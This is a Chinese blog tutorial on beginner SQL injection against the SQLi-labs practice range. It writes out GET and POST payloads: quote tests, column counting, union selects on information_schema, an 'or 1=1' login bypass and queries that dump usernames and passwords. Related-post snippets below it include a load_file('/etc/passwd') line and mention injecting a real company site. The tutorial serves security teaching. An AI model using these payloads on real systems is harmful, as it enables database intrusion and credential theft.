一篇文章教你玩转,入门级 SQL 注入实战!

于 2024-04-11 12:55:43 发布
阅读量581 收藏 8
点赞数 11
文章标签: SQL 注入
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_58552717/article/details/137634844
版权

 

SQL注入原理可描述为通过用户可控参数中注入SQL语法,在程序员未对输入数据合法性做判断或

过滤不严情况下,破坏原有SQL结构,达到编写程序时意料之外的结果。上篇文章已经搭建好了

SQLi-labs靶场,一共包含65关,适用于GET和POST场景。接下来让我们开始SQL注入实战

一、实战准备

安全测试靶场:SQLi-labs

工具:Firefox、Firefox插件HackBar、burpsuite或任意抓包工具

二、SQL注入思路

1、判断是否存在SQL注入漏洞

2、猜解SQL查询语句中的字段数

3、获取当前数据库

4、获取数据库中的表

5、获取表中的字段名

6、获取指定字段的数据

三、SQL注入实战-Get场景

进入SQLi-labs的Less-1关,输入id的值

1、id=1' ,发起请求,返回SQL语法错误

图片

2、id = 1'--+;程序未对输入内容做限制, 语句执行成功,页面返回了id=1的用户信息,存在SQL注入漏洞

图片

3、判断当前表的字段数

select * from users where id='1' order by 1; 该语句中order by 1为按第1列的数据进行排序。

输入 id=1' order by 3 #,回显数据正常,表示当前查询表存在第3列数据。

图片

输入 id=1' order by 4 #,报错!不存在第4列,说明当前查询的用户表数据一共只有3列!

图片

4、获取数据库库名

使用union联合查询,让union前面的select语句查询为空,然后采用后面的select语句查询并输出。

id=' union select 1,2,group_concat(schema_name) from information_schema.schemata #; 可回显所有的数据库库名。

图片

5、获取数据库的表名

id=' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='security' #;获取到security库的所有表名。

图片

6、获取表中的字段名

id=' union select 1,group_concat(column_name) from information_schema.columns where table_name='users' #;其中,如果不支持'users'单引号,可转为十六进制,7573657273为users的十六进制。得到users表的所有字段。

图片

7、获取表中需要的数据

id=' union select 1,2,group_concat(concat_ws('~',username,password)) from security.users #;

可以得到users表中所有用户和密码信息。其中7e是~的十六进制表示。

图片

四、SQL注入实战-POST场景

进入SQLi-labs的Less-11关,输入Username、Password。

1、判断是否存在sql注入漏洞

在username中填写’,password中随便写,出现sql语法错误。或者通过bp截获到请求信息,uname=’ & passwd=1&submit=Submit。

图片

直接在username中填写admin’or 1=1#,password随便写,此时登录成功,Username存在SQL注入漏洞。Password同理。

图片

2、判断当前查询表的字段数

通过burpsuite截获数据(用任意抓包工具都可),并发送到Repeater,修改数据并进行重发:

图片

在burpsuite中分别修改数据,进行后续步骤的操作:

uname=admin’order by 3#&passwd=a&submit=Submit 或者是使用uname=admin&passwd=a’order by 2# &submit=Submit 同样可以进行判断,最后得出一共有两列。

图片

图片

3、获取当前数据库名

uname=a&passwd=a’union select database(),2 # &submit=Submit查询到当前的数据库为security,或者使用:uname=a’ union select database(),2 # & passwd=a&submit=Submit均可查询到当前数据库,当然也可以查询其它信息。

图片

4、获取当前数据库下的表名

uname=a' union select 1, (select group_concat(table_name) from information_schema.tables where table_schema='security')# &passwd=a&submit=Submit可以得到security数据库中所有的表信息

图片

5、获取表中字段名

uname=a%27 union select 1,group_concat(column_name) from information_schema.columns where table_name='users'#&passwd=a&submit=Submit 可以得到users表所有字段值信息,为id,username、password

图片

6、获取表中数据

uname=a%27 union select 1,group_concat(concat_ws('~',username,password)) from security.users#&passwd=a&submit=Submit,可以得到users表所有用户及密码信息。

图片

 

当然,以上基于sqli-labs的注入实操只是入门级,感兴趣的同学可以继续钻研其他关卡!

 

学无止境,行以致远!

程序员与诗人
关注
  • 11
    点赞
  • 8
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
sql手工注入实战
mulincong的博客
05-30 2229
sql手工注入封神台靶场
SQL注入实战操作
ting_liang的博客
01-19 607
在url中,如果是get请求(记住是get请求,也就是我们在浏览器中输入的ur),解释执行的时候,ur中#号是用来指导浏览器动作的,对服务器端无用。(有个空格),在传输过程中空格会被忽略同样导致无法注释,所以在get请求传参注入时才会使用--+的方式来闭合,因为+会被解释成空格。mysql数据库注释(#、-- 空格(%20)、/*...*/、/*!2、cms注入:CMS逻辑:index.php首页展示内容,具有文章列表(链接具有文章id)、articles.php文。1、有回显(基于错误的)
SQL注入实战
qq_44915227的博客
04-17 1783
所谓的SQL注入,就是通过把恶意的sql命令插入web表单递交给服务器,或者输入域名或页面请求的查询字符串递交到服务器,达到欺骗服务器,让服务器执行这些恶意的sql命令,从而让攻击者,可以绕过一些机制,达到直接访问数据库的一种攻击手段,而不是按照设计者意图去执行SQL语句。
SQL注入实战
hxhabcd123的博客
08-28 2435
本文记录各种SQL注入类型的实操过程
sql注入实战
2201_75735270的博客
07-31 929
SQL注入是一种代码注入技术,过去常常用于攻击数据驱动性的应用,实质就是将恶意的SQL代码注入到特定字段用于实施拖库攻击等。SQL注入的成功必须借助应用程序的安全漏洞,例如用户输入没有经过正确地过滤(针对某些特定字符串)或者没有特别强调类型的时候,都容易造成异常地执行SQL语句。SQL注入是网站渗透中最常用的攻击技术,但是其实SQL注入可以用来攻击所有的SQL数据库。
SQL注入实战总结
qq_44657899的博客
06-16 1393
文章目录0x01 联合注入:union0x02 boolean注入 盲注 0x01 联合注入:union database()库名 user()用户 version()版本号 load_file('/etc/passwd') group_concat(password) 0x02 boolean注入 盲注 基本思路 and 1=1 返回1 yes and 1=2 返回0 no 判断数据库长度 ' and lenth(database())>=4 --+ 判断数据库名字 ' and substr(d
推荐一篇入门级的Class文章
10-30
推荐一篇入门级的Class
OracleSQL入门级PPT程汇总
07-23
程名称:Oracle SQL入门级PPT程汇总课程目录:【】第1章 简单查询语句【】第2章 限定查询和排序【】第3章 单行函数【】第4章 多表查询【】第5章 组函数和分组统计 资源太大,传百度网盘了,链接在附件中,有需要...
一篇文章带你入门Oracle注入1
08-03
1. varchar, varchar2 表示个字符串 3. DATA 表示期类型 4. CLOB 对象,表示本数据类型,可存4G 5. BLOB 对象,表示进
sql语句实战
12-14
数据库表 sql语句格式: 实战: 设置sc(成绩表)表中sno,cno唯一键 alter table sc add unique(sno,cno); 查询所有同学的学号、姓名、选课数、总成绩 SELECT sc.sno,sname,COUNT(cno) '选课数',SUM(score) 'sum' FROM student,sc WHERE sc.sno=student.sno GROUP BY sc.sno 查询姓“李”的老师的个数 SELECT count(tno) FROM teacher where tname LIKE '李%' 求选择了Java课程且成绩小于60的同学
sql注入之新手入门示例详解
09-10
SQL注入是一种常见的网络安全威胁,它发生在应用程序接收用户输入并直接构造SQL查询时,如果没有正确地过滤或转义这些输入,攻击者就能插入恶意的SQL语句,从而获取、修改、删除数据库中的敏感信息,甚至完全控制...
记一次对真实网站的SQL注入实战
qq_43678263的博客
03-31 4937
记一次对真实网站的SQL注入实战前言发现过程漏洞利用总结 前言 某集团股份有限公司网站存在SQL注入漏洞 发现过程 用针对性工具扫描(这里使用的是超级SQL注入工具)问题网站,得到以下链接均存在SQL注入漏洞 问题URL: fuwu_fanwei.php?fid=1 fuwu_zhichi.php?zid=5 video.php?video_id=1 news.php?nid=1 about.php?aid=1 fuwu_fanwei_content.php?fid=1&id=1 漏洞利用 这里使
SQL(入门实战-01)
weixin_44464850的博客
04-19 735
1.查询结果去重 mysql练习 drop table if exists user_profile; CREATE TABLE `user_profile` ( `id` int NOT NULL, `device_id` int NOT NULL, `gender` varchar(14) NOT NULL, `age` int , `university` varchar(32) NOT NULL, `province` varcha
【网络安全】SQL注入_sql注入攻击实例(网安人必学系列)
最新发布
weixin_57514792的博客
02-25 1243
网络安全必学SQL注入
2.2 SQL入门和实战
Micoreal的博客
01-15 843
个人学习笔记,有兴趣可以看看
SQL注入【ByPass有点难的靶场实战】(九)
12-30 1059
SQL注入【ByPass有点难的靶场实战
SQL注入攻击实战演示(附源码)
hack0919的博客
03-31 4315
SQL注入是一种非常常见的数据库攻击手段,SQL注入漏洞也是网络世界中最普遍的漏洞之一。
火狐hackbar使用
10-31
HackBar是一款Firefox浏览器上的插件,它是一个小工具包,包含一些黑客常用的工具,比如SQL注入、XSS、加密等。下面是使用HackBar的步骤: 1. 首先,你需要在Firefox浏览器中安装HackBar插件。 2. 打开一个网站,点击HackBar插件图标,就可以打开HackBar工具栏。 3. 在HackBar工具栏中,你可以输入你想要测试的URL地址,然后点击“Go”按钮。 4. 在HackBar工具栏中,你可以使用各种工具来测试网站的安全性,比如SQL注入、XSS、加密等。 5. 在HackBar工具栏中,你可以使用“Encode/Decode”按钮来对URL进行编码和解码。 6. 在HackBar工具栏中,你可以使用“Options”按钮来配置HackBar插件的一些选项,比如设置代理服务器等。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值